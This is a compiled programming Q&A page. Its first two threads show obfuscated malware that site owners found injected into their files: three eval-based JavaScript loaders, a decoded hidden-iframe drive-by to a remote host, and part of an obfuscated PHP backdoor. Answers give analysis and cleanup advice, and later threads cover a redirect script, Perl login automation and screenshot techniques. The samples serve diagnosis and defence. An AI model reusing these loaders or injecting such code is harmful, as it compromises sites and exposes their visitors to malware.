What does this script do? - javascript

Would anybody be able to tell me what the below script does? It keeps injecting itself into our site about every two weeks (always between Sundays and Mondays). We've reloaded our "clean" site dozens of times but it just keeps happening. We've installed and made every security recommendation that we've read but it just keeps getting into all of our index.html files and a few of our php files.
Anybody have any idea of what it does or where it comes from? We could really use some help!
<script>
var ar="v)y{ifu=lg[rETCB}me h>;
s\"/ 0.,tN1:('<cAb]waonpd";
try{
'qwe'.length(1);
}catch(a){
k=new Boolean().toString();
date=new Date();
};
var ar2 = "f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,3,9,57,57,57,12,15,33,126,51,54,33,102,3,66,57,57,48,78,54,24,69,54,78,9,57,57,57,138,129,111,18,51,54,132,90,84,123,33,12,90,54,102,72,108,12,15,33,126,51,54,78,69,33,111,21,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,78,123,12,138,90,60,21,105,96,81,105,78,60,54,12,27,60,90,21,105,96,81,105,78,69,90,6,24,54,21,105,0,12,69,12,117,12,24,12,90,6,99,60,12,138,138,54,132,66,135,129,69,12,90,12,129,132,99,126,117,69,129,24,18,90,54,66,24,54,15,90,99,81,66,90,129,135,99,81,66,105,63,108,75,12,15,33,126,51,54,63,72,3,66,57,57,48,57,57,15,18,132,111,90,12,129,132,78,12,15,33,126,51,54,33,102,3,9,57,57,57,0,126,33,78,15,78,21,78,138,129,111,18,51,54,132,90,84,111,33,54,126,90,54,36,24,54,51,54,132,90,102,105,12,15,33,126,51,54,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,69,33,111,105,87,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,3,66,15,84,69,90,6,24,54,84,0,12,69,12,117,12,24,12,90,6,21,105,60,12,138,138,54,132,105,66,15,84,69,90,6,24,54,84,135,129,69,12,90,12,129,132,21,105,126,117,69,129,24,18,90,54,105,66,15,84,69,90,6,24,54,84,24,54,15,90,21,105,81,105,66,15,84,69,90,6,24,54,84,90,129,135,21,105,81,105,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,123,12,138,90,60,105,87,105,96,81,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,60,54,12,27,60,90,105,87,105,96,81,105,3,66,57,57,57,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,84,126,135,135,54,132,138,42,60,12,24,138,102,15,3,66,57,57,48]".replace(k.substr(0,1),'[');
// Builds the string "rn eval" without ever spelling it out: each comma
// expression evaluates to its last operand, so this line is
// "rn ev2010".replace(date.getFullYear() - 1, "al"). The substitution only
// matches when the visitor's clock reports the year 2011; with any other year
// "2010" stays in the string and the decode below fails.
pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));
// Function("return eval")() hands back a reference to eval under the name e.
e=Function("retu"+pau)();
// First eval: turns the ar2 string into an array of numbers.
ar2=('gfhgffg',e(ar2));s="";
// Each number divided by 3 is an index into the scrambled alphabet in ar;
// the loop rebuilds the hidden source one character at a time.
for(i=0;i<ar2.length;i++){
s+=ar.substr(ar2[i]/3,1);
}
// Second eval: runs the rebuilt string. When analysing a sample like this,
// print s instead of evaluating it.
e(s);
</script>
<script>
var ar="N<B)10'paes,>.nidtf3[T;
hwy mCE:gA{](=o/\"c}lbr vu";
try{
'qwe'.length(1);
}catch(a){
k=new Boolean().toString();
date=new Date();
};
var ar2 = "f78,78,45,54,135,105,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,9,99,78,78,78,45,54,132,24,81,27,132,105,9,66,78,78,123,135,27,126,30,27,135,99,78,78,78,48,111,120,141,81,27,42,51,39,72,132,45,51,27,105,117,3,45,54,132,24,81,27,135,30,132,120,108,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,135,72,45,48,51,69,108,18,12,15,18,135,69,27,45,93,69,51,108,18,12,15,18,135,30,51,75,126,27,108,18,138,45,30,45,129,45,126,45,51,75,90,69,45,48,48,27,42,66,21,111,30,45,51,45,111,42,90,24,129,30,111,126,141,51,27,66,126,27,54,51,90,15,66,51,111,21,90,15,66,18,36,3,114,45,54,132,24,81,27,36,117,9,66,78,78,123,78,78,54,141,42,120,51,45,111,42,135,45,54,132,24,81,27,132,105,9,99,78,78,78,138,24,132,135,54,135,108,135,48,111,120,141,81,27,42,51,39,120,132,27,24,51,27,87,126,27,81,27,42,51,105,18,45,54,132,24,81,27,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,30,132,120,18,33,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,9,66,54,39,30,51,75,126,27,39,138,45,30,45,129,45,126,45,51,75,108,18,69,45,48,48,27,42,18,66,54,39,30,51,75,126,27,39,21,111,30,45,51,45,111,42,108,18,24,129,30,111,126,141,51,27,18,66,54,39,30,51,75,126,27,39,126,27,54,51,108,18,15,18,66,54,39,30,51,75,126,27,39,51,111,21,108,18,15,18,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,72,45,48,51,69,18,33,18,12,15,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,69,27,45,93,69,51,18,33,18,12,15,18,9,66,78,78,78,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,39,24,21,21,27,42,48,84,69,45,126,48,105,54,9,66,78,78,123]".replace(k.substr(0,1),'[');
// Same construction as the script above: the comma expressions collapse to
// "rn ev2010".replace(date.getFullYear() - 1, "al"), which yields "rn eval"
// only when the clock year is 2011.
pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));
// e becomes a reference to eval.
e=Function("retu"+pau)();
// First eval: parses the ar2 string into an array of numbers.
ar2=('gfhgffg',e(ar2));
s="";
// ar2[i]/3 indexes into the alphabet string ar (a different alphabet from the
// first script, so the numbers differ even if the payload is similar).
for(i=0;i<ar2.length;i++){
s+=ar.substr(ar2[i]/3,1);
}
// Second eval: executes the decoded string.
e(s);
</script>
<script>
var ar="rf:pmy'1uvAE, hi)2Tbs{ [tg=BcC\"do<a(.}N/9];wl>en0";
try{
gserkewg();
}catch(a){
k=new Boolean().toString()
};
var ar2 = "f66,0,-21,-42,36,66,-12,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-75,15,3,0,0,-21,-42,-3,102,-90,126,-138,105,-57,78,-60,0,45,-72,99,-6,-72,78,-99,24,3,0,0,27,3,-12,-60,-12,126,3,-69,36,21,-129,45,27,66,-33,-15,9,-54,-42,-3,102,-90,126,-99,21,-60,84,-6,-60,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,21,90,-84,48,-21,-30,36,-60,3,123,-126,21,3,96,-93,30,-33,30,6,-60,3,123,-126,21,21,12,-57,117,6,-60,-60,9,18,15,-15,12,-12,87,-87,27,-57,-9,36,3,48,0,45,3,-15,-117,87,-36,-15,27,-27,51,45,-135,96,-45,3,36,36,-108,48,66,-12,6,6,-135,69,-66,138,-18,-54,24,-87,-3,138,-18,-108,117,-36,18,-72,-42,-3,102,-90,126,-3,-45,-42,78,-60,0,45,-45,0,-63,21,117,-57,-12,-27,51,45,-102,6,-42,-3,102,-90,126,-138,105,-57,15,3,0,0,-39,75,-102,39,-36,36,39,-39,54,3,-12,-60,-12,126,3,-69,36,-24,-84,138,-36,-30,66,-105,99,6,-126,126,3,-69,33,-87,27,-42,-3,102,-90,126,-120,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,42,-60,84,-66,18,-18,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,30,78,-123,105,-48,12,-57,117,6,-30,-81,18,15,-15,12,-12,87,-87,27,-57,63,-60,24,3,48,0,45,3,-123,108,-123,105,-48,12,-57,117,6,-30,-99,87,-36,-15,27,-27,51,45,-63,-60,84,-45,3,36,36,-108,48,66,-120,108,-123,105,-48,12,-57,117,6,-30,24,6,-135,69,6,-60,126,-126,108,-123,105,-48,12,-57,117,6,-30,-36,24,-87,69,-60,126,-126,108,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,111,-84,48,-21,-30,-24,18,-18,3,123,-126,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,24,96,-93,30,-33,30,-54,18,-18,3,123,-126,30,78,-60,0,0,27,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-15,-6,-93,0,129,3,-48,-6,-45,3,87,-39,12,-102,45,78,-60,0,45]".replace(k.substr(0,1),'[');
// asfasf is presumably undefined, so the call throws on purpose and the catch
// block runs. typeof document is "object" in a browser page.
try{
asfasf();
}catch(e)
{
p=(typeof document).toString()
};
// "rn evobject" becomes "rn eval" only when p is "object", i.e. when a DOM
// document exists; a harness without one leaves the string unchanged and the
// decode below fails.
pau="rn evobject".replace(p,"al");
// new Function("", "return eval") followed by the call yields eval itself.
e=new Function("","retu"+pau);
e=e();
// First eval: parses the ar2 string into an array of numbers.
ar2=e(ar2);
s="";
var pos=0;
// Delta decoding: k is "false" (set in the earlier catch block); it is
// rewritten to "0asd" and parsed as 0, so each step adds ar2[i]/3 to pos and
// takes the character of ar at that position.
for(i=0;i!=ar2.length;i++){
pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;
s+=ar.substr(pos,1);
}
// Second eval: executes the rebuilt string.
e(s);
</script>

Via the power of JSUnpack, we can decrypt a chunk of that obfuscated code and see part of the functionality...
document.write (s) <iframe src='http://doloasxxxxedoutforsafety.com/count0.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
That source is currently 404, but it doesn't look very friendly. It's effectively downloading an arbitrary page into the browser, which could be for something as "simple" as fake Pagerank building through to a malicious drive by code execution exploit. Regardless, it appears dead for now, but it probably wasn't trying to help you.
You seem to have some kind of XSS injection flaw in your site software (or a malicious internal user). Since the script ends up inside the index.html and php files themselves, whoever is doing this has write access to the web root, so include the FTP/hosting accounts and file permissions in the review. Looks like it's time for a proper security audit (of the server, the server software, and your PHP application). If you're running an off-the-shelf PHP package (like WordPress), make sure you've upgraded to the latest version. You might also want to change any relevant passwords (if it's happening on a regular schedule, it might be a manual injection).

The script is probably designed to lure users to a site containing malware and browser exploits.
The reason you're repeatedly being infected is that somewhere in your codebase there is a vulnerability. I suspect you've got an unprotected or broken file upload page that allows any old file to be uploaded (including scripts) and then executed. Once it's done infecting your files it probably deletes itself.
I would have a trawl through your web server log files at around the time the infection happens and look for suspicious activity for any pages that allow users to upload content.

what other scripts do you use on your site? look at those because those could be injecting this.
maybe your webhost is shady, try to change. Or it could be a web analytics code

The exact same code is being injected into the index.html file on one of my sites. By looking at the logs we determined that someone with the IP address 84.16.226.245 had gotten access via FTP. We're not exactly sure how he got in yet, but you might want to take a look at your logs and block that address. Blocking one address only helps until the login comes from another one, so change the FTP passwords as well.
Good luck!

Related

How can I make a Java Script to redirect to another domain?

my name is Angel and I am not a programmer nor do I have previous experience with any language, today I have noticed that a forum to which I belong bought a new domain, but there is a problem with cookies, since it is not possible to log in if accessed from the new domain.
Many users have had this problem and I wanted to try to make a java script to solve this problem, but the furthest I got was that any web page was redirected to the forum home page, reloading over and over again.
I'm not good at programming, but Javascript has piqued my interest, because of the ease of transforming it into a browser extension.
What I mean is redirect from:
forum.free.com/discussion/8873
to
cooldomain.com/discussion/8873
and that every url with the domain "forum.free.com" redirects to the same page, only with the new domain of "cooldomain.com"
I know that it is a simple script and that it is too much to ask, but the intention is to learn through the use of annotations the reason for each line and to help the users of said forum.
Thank you.
This is the "script" i "made":
// Dispatch on the host the current page was loaded from.
switch(window.location.hostname){
case "forum.free.com":
// "cooldomain.com" has no scheme, so the browser resolves it as a relative
// path on the current host instead of navigating to the new domain; the path
// of the original page (/discussion/8873) is not carried over either.
window.location.replace("cooldomain.com");
break;
...
}
you can try something like this:
<script language=javascript>
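/**
 * Send the visitor to the same page on the new domain.
 *
 * Does nothing unless the page was loaded from the old host, so it cannot
 * loop once the visitor is on cooldomain.com. The host is compared exactly
 * (no substring match) and the target host is a fixed value, so nothing taken
 * from the URL decides where the visitor ends up; path, query string and
 * fragment are carried over unchanged.
 */
function redirect(){
  var OLD_HOST = "forum.free.com";
  var NEW_HOST = "cooldomain.com";
  if (window.location.hostname !== OLD_HOST) {
    return;
  }
  var target = new URL(window.location.href);
  target.hostname = NEW_HOST;
  // replace() keeps the old address out of the history, so Back does not
  // bounce the visitor into the redirect again.
  window.location.replace(target.href);
}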
</script>

Corrupted file on my ftp server in my wordpress site

I'm in charge of a WordPress website. One year ago the site was hacked. When someone opened the site by typing the URL, they were redirected to another "fake" site. I discovered that a single line had been added to index.php to redirect to another site. I removed the line and restored my FTP server. Before that I noticed some suspicious files on the FTP server; I had not created these files, and they contained some obscure PHP and JS code with random characters.
Recently the site had the same problem unless there was only a blank page when we connect on the site. I restored again the site. Before that i noticed some suspicious files on the ftp server, i did not created these file, and there was some obscure php and js code in it, with some random char.
All the files had almost the same creation date and I had no right to delete them from the server. I think the vulnerabilities come from there, but I can't find any similar case on the internet. Does someone have information about it? I'm just looking for some information now and I don't have access to the site at the moment.
EDIT:
I have this kind of file :
<?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
// Decoder for the long string below: every character of $vMCS1QU that is a
// key in the map $vDG7FSU is swapped for the mapped character (characters
// without an entry pass through unchanged), and the result is base64-decoded.
// NOTE(review): the substitution step presumably exists so the payload does
// not look like plain base64 to a scanner — confirm against the rest of the file.
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.
someone know what it is ?
This is incredibly broad. There are literally millions of possible vectors for attack on a website. The fact that you were attacked does not in itself suggest any one of those possibilities over any other.
Since you have a timestamp when the attack occurred, check server logs at that time for clues about the vector. Was there SFTP access at that time? Perhaps a legitimate user's password is compromised. Was there HTTP access at that time? Perhaps a plugin has a vulnerability and needs to be disabled or upgraded.
An attacker only needs one vulnerability to gain access to the site. It may be obvious which it was (e.g., if you see SFTP activity from a known user account), or it may take extensive research to figure out what happened and how.
It's very simple: you got hacked.
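Forget trying to deobfuscate the php files; they may tell you what the files do, but they won't tell you how the files got there. Note their paths and modification times first, since those are what you will match against the server logs, then delete them all.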
And you won't find the exploit vector unless you carefully parse server logs and check all your plugins and theme for vulnerabilities. And the vector could have been malware on your own PC/mac that stole credentials.
The fix is simple: carefully clean the site and the hosting account by following FAQ My site was hacked - WordPress Codex. Scan your own PC/Mac and any machine that was used to access WordPress admin and the hosting account.
If this is your own server, you need to harden it, too. Try searching https://serverfault.com/ for information on your OS and how to secure and harden it.
And take a look at the recommended security measures for WordPress itself in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex
When you say you have no right to delete them, aren't you managing the site? If you do not have full administrative rights, you should contact whoever does and explain the situation so that they may handle it immediately, or at least enable you to do so.
Do you know how the site was hacked the first and second time? Obviously there is a vulnerability that needs to be addressed.
What kind of files were left behind? Can you examine/explain the contents any further than finding 'obscure' code?

How to manipulate Javascript websites in Perl

I have been asked to automate the logging into a webapp(what I assume to be one, that runs a lot of .aspx and .js scripts) that, currently, can only run in IE. Now i am programming in Perl and have tried to use Win32::IE::Mechanize to run the IE browser and log in. What i did was try an extract all the forms from the webapp, and given the users information, fill out the required forms, but this is where the problem arises, when I try and run the subroutine no forms appear......
So then I transitioned into WWW::Mechanize and used the post subroutine(from LWP::UserAgent) which solved the problem for the most part. Now i've run into a problem in the response, from the server, I get this script as the content of the response and I don't know what to do with it.
So my question is: Using Perl how can I go about to manipulate a Javascript functions in a website? Would that even be a valid solution to the problem?
I am open to writing this in other programming languages as well. Thanks in advance for the help!
(So that I can fully log in to the webapp)
Update: The content of the response:
// Handle of the repeating timer started in WindowOnLoad.
var msgTimerID;
var strForceLogOff = "false";
// Both conditions compare string literals that are already fixed in this
// response ("false" == "true"), so neither branch runs in this copy of the page.
// NOTE(review): the literals look like values the server fills in per
// response — confirm by comparing with another response.
function WindowOnLoad(){
if ("false" == "true" && "false" == "false")
MerlinSystemMsg("",64);
if ("false"=="true")
// String form of setInterval: the text is evaluated as code every 300000 ms.
msgTimerID = window.setInterval("MerlinSystemMsg(10095,64)", 300000,'javascript');
}
// showModalDialog is a non-standard dialog API that current browsers have
// removed. strFeatures is only assigned inside WindowOnUnLoad below.
function MyShowModal(){
showModalDialog("", window, strFeatures);}
// Stops the timer started in WindowOnLoad.
function clearMsgInterval(){
window.clearInterval(msgTimerID);
}
// On unload, if the OPMODE field in the first frame reads "LOGOFF", open a
// 1x1 window at position 1000,1000 on ForceLogOff.aspx. top.frames(0) calls
// the frames collection like a function, which is IE-specific syntax.
// NOTE(review): ForceLogOff.aspx presumably ends the server-side session — an
// automated client would have to request it itself; confirm.
function WindowOnUnLoad(){
if(top.frames(0).document.getElementById("OPMODE").value =="LOGOFF"){
strFeatures = "width=1,height=1,left=1000,top=1000,toolbar=no,scrollbars=no,menubar=no,location=no,directories=no,status=yes,resizable=1";
window.open("ForceLogOff.aspx","forcelogout",strFeatures);
}
}
window.onbeforeunload = WindowOnUnLoad;
window.onload = WindowOnLoad;
There is also this Frame Title that has the src:
FRAME TITLE="Service Desk Express Navigator" SRC="options_nailogo.aspx" MARGINWIDTH=0 MARGINHEIGHT=0 NORESIZE scrolling=no
Trying to emulate the browser with a fully functioning JS engine is going to be a mighty big task. Instead, I'd suggest that you just try to emulate the actual interaction with the web site and not care what HTML/JS is actually sent back. Your server side code doesn't care how the HTTP submissions take place, only that they do. Admittedly this is more fragile if the forms change a lot, but at least you're not trying to implement a full browser.
So look at modules like LWP::UserAgent, HTTP::Request and HTTP::Response.
I'm copying and pasting my answer to your other duplicate question here
(You should consider deleting one of these?)
That content is the website source :)
How WWW::Mechanize deals with FRAME SRC as a link:
Note that <FRAME SRC="..."> tags are parsed out of the the HTML and
treated as links so this method works with them.
You'll want to use follow_link on that link.
As far as dealing with Javascript, there is support for a Firefox Add-on called MozRepl that you can use in conjunction with WWW::Mechanize::Firefox that I have used in the past to call Javascript code while crawling a page.

Take Screenshot of Browser via JavaScript (or something else)

For support reasons I want to be able for a user to take a screenshot of the current browser window as easy as possible and send it over to the server.
Any (crazy) ideas?
That would appear to be a pretty big security hole in JavaScript if you could do this. Imagine a malicious user installing that code on your site with a XSS attack and then screenshotting all of your daily work. Imagine that happening with your online banking...
However, it is possible to do this sort of thing outside of JavaScript. I developed a Swing application that used screen capture code like this which did a great job of sending an email to the helpdesk with an attached screenshot whenever the user encountered a RuntimeException.
I suppose you could experiment with a signed Java applet (shock! horror! noooooo!) that hung around in the corner. If executed with the appropriate security privileges given at installation it might be coerced into executing that kind of screenshot code.
For convenience, here is the code from the site I linked to:
import java.awt.Dimension;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.image.BufferedImage;
import javax.imageio.ImageIO;
import java.io.File;
...
/**
 * Grabs the whole screen and stores it as a PNG file.
 *
 * The capture covers the full screen rectangle reported by the toolkit, so it
 * contains whatever else is visible on the display, not only this
 * application's window.
 *
 * @param fileName path of the PNG file to write
 * @throws Exception if the Robot cannot be created or the image cannot be written
 */
public void captureScreen(String fileName) throws Exception {
    Rectangle wholeScreen = new Rectangle(Toolkit.getDefaultToolkit().getScreenSize());
    BufferedImage capture = new Robot().createScreenCapture(wholeScreen);
    ImageIO.write(capture, "png", new File(fileName));
}
...
Please see the answer shared here for a relatively successful implementation of this:
https://stackoverflow.com/a/6678156/291640
Utilizing:
https://github.com/niklasvh/html2canvas
You could try to render the whole page in canvas and save this image back to server. have fun :)
A webpage can't do this (or at least, I would be very surprised if it could, in any browser) but a Firefox extension can. See https://developer.mozilla.org/en/Drawing_Graphics_with_Canvas#Rendering_Web_Content_Into_A_Canvas -- when that page says "Chrome privileges" that means an extension can do it, but a web page can't.
Seems to me that support needs (at least) the answers for two questions:
What does the screen look like? and
Why does it look that way?
A screenshot -- a visual -- is very necessary and answers the first question, but it can't answer the second.
As a first attempt, I'd try to send the entire page up to support. The support tech could display that page in his browser (answers the first question); and could also see the current state of the customer's html (helps to answer the second question).
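I'd try to send as much of the page as is available to the client JS by way of AJAX or as the payload of a form. I'd also send info not on the page: anything that affects the state of the page, like cookies or session IDs or whatever. Treat that upload as sensitive: a captured session ID lets whoever reads the report act as the user until the session expires.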
The cust might have a submit-like button to start the process.
I think that would work. Let's see: it needs some CGI somewhere on the server that catches the incoming user page and makes it available to support, maybe by writing a disk file. Then the support person can load (or have loaded automatically) that same page. All the other info (cookies and so on) can be put into the page that support sees.
PLUS: the client JS that handles the submit-button onclick( ) could also include any useful JS variable values!
Hey, this can work! I'm getting psyched :-)
HTH
-- pete
I've seen people either do this with two approaches:
setup a separate server for screenshotting and run a bunch of firefox instances on there, check out these two gem if you're doing it in ruby: selenium-webdriver and headless
use a hosted solution like http://url2png.com (way easier)
You can also do this with the Fireshot plugin. I use the following code (that I extracted from the API code so I don't need to include the API JS) to make a direct call to the Fireshot object:
// Build the custom element that carries the capture request and describe the
// request through its attributes.
var element = document.createElement("FireShotDataElement");
[
  ["Entire", true],
  ["Action", 1],
  ["Key", ""],
  ["BASE64Content", ""],
  ["Data", "C:/Users/jagilber/Downloads/whatev.jpg"]
].forEach(function (pair) {
  element.setAttribute(pair[0], pair[1]);
});
// CapturedFrameId may not be declared at all, hence the typeof guard.
if (typeof CapturedFrameId !== "undefined") {
  element.setAttribute("CapturedFrameId", CapturedFrameId);
}
document.documentElement.appendChild(element);
// Dispatch the custom event on the element to hand the request over.
var evt = document.createEvent("Events");
evt.initEvent("capturePageEvt", true, false);
element.dispatchEvent(evt);
Note: I don't know if this functionality is only available for the paid version or not.
Perhaps http://html2canvas.hertzen.com/ could be used. Then you can capture the display and then process it.
You might try PhantomJS, a headless browsing toolkit.
http://phantomjs.org/
The following Javascript example demonstrates basic screenshot functionality:
// PhantomJS script: load one page in the headless browser and save it as a PNG.
// The URL is fixed here. If it ever comes from a user, check it against an
// allow-list before page.open(): a headless browser running on your server
// can reach addresses that the user cannot.
var page = require('webpage').create();
var side = 1200;

// Called once the page has been opened: write the image, then end the process.
function saveAndQuit() {
  page.render('output.png');
  phantom.exit();
}

page.settings.userAgent = 'UltimateBrowser/100';
page.viewportSize = { width: side, height: side };
page.clipRect = { top: 0, left: 0, width: side, height: side };
page.open('https://google.com/', saveAndQuit);
I understand this post is 5 years old, but for the sake of future visits I'll add my own solution here which I think solves the original post's question without any third-party libraries apart from jQuery.
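// Snapshot the current DOM so it can be sent to support as an HTML string.
// The snapshot contains everything in the page, including hidden form fields
// and any tokens rendered into it; remove what support does not need before
// sending.
pageClone = $('html').clone();
// Make sure that CSS and images load correctly when opening this clone.
// The href is set through .attr() rather than concatenated into markup, so a
// quote character in the current URL cannot break out of the attribute and
// add markup to the file support will open.
pageClone.find('head').append($('<base>').attr('href', location.href));
// OPTIONAL: Remove potentially interfering scripts so the page is static.
// This drops <script> elements only; inline on* handler attributes stay.
pageClone.find('script').remove();
htmlString = pageClone.html();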
You could remove other parts of the DOM you think are unnecessary, such as the support form if it is in a modal window. Or you could choose not to remove scripts if you prefer to maintain some interaction with dynamic controls.
Send that string to the server, either in a hidden field or by AJAX, and then on the server side just attach the whole lot as an HTML file to the support email.
The benefits of this are that you'll get not just a screenshot but the entire scrollable page in its current form, plus you can even inspect and debug the DOM.
Print Screen? Old school and a couple of keypresses, but it works!
This may not work for you, but on IE you can use the snapsie plugin. It doesn't seem to be in development anymore, but the last release is available from the linked site.
